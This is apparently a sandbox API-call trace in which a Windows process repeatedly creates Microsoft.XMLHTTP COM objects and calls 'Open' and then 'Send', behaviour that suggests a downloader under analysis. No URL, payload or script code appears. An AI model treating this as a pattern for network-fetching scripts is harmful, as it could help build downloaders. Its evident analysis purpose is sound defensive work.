	[0470.786] SysStringLen (param_1=0x0) returned 0x0
	[0470.786] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0470.787] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0470.787] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0470.787] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0470.787] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0470.787] ??2@YAPEAX_K@Z () returned 0x62f330
	[0470.787] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0470.787] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0470.787] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0470.787] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0470.787] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0470.787] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0470.787] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0470.790] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0470.790] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0470.790] SysStringLen (param_1=0x0) returned 0x0
	[0470.790] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0470.790] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0470.790] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0470.790] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0470.790] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0470.790] ??2@YAPEAX_K@Z () returned 0x62f310
	[0470.790] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f310) 
	[0470.790] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0470.790] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0470.790] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0470.791] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0470.791] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0470.791] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0470.791] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0470.791] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0470.791] SysStringLen (param_1=0x0) returned 0x0
	[0470.791] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0470.791] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0470.791] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c30) returned 0x0
	[0470.791] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0470.791] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0470.791] ??2@YAPEAX_K@Z () returned 0x62f330
	[0470.791] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0470.791] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0470.791] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0470.792] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c30) returned 0x0
	[0470.792] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c30) returned 0x3
	[0470.792] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0470.792] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c30, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0470.792] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0470.792] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0470.792] SysStringLen (param_1=0x0) returned 0x0
	[0470.792] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0470.792] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0470.792] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0470.792] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0470.792] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0470.792] ??2@YAPEAX_K@Z () returned 0x62f310
	[0470.792] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0470.792] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0470.793] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0470.793] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0470.793] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0470.793] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0470.793] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0470.793] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0470.793] longjmp () 
	[0470.793] longjmp () 
	[0470.793] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0470.793] SysStringLen (param_1=0x0) returned 0x0
	[0470.793] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0470.793] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0470.793] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7530) returned 0x0
	[0470.794] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0470.794] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0470.794] ??2@YAPEAX_K@Z () returned 0x62f330
	[0470.794] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0470.794] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0470.794] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0470.794] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7530) returned 0x0
	[0470.794] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7530) returned 0x3
	[0470.794] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0470.794] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7530, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0470.794] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0470.794] longjmp () 
	[0470.795] longjmp () 
	[0470.795] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0470.795] SysStringLen (param_1=0x0) returned 0x0
	[0470.795] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0470.795] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0470.795] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c30) returned 0x0
	[0470.795] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0470.795] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74a8) returned 0x0
	[0470.795] ??2@YAPEAX_K@Z () returned 0x62f310
	[0470.795] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74a8, pUnkSite=0x62f310) 
	[0470.795] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0470.795] XMLHTTPRequest:IUnknown:Release (This=0x49c74a8) returned 0x0
	[0470.797] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c30) returned 0x0
	[0470.797] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c30) returned 0x3
	[0470.797] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0470.798] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c30, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0470.798] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0470.798] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0470.798] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c30, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0470.798] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0470.958] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
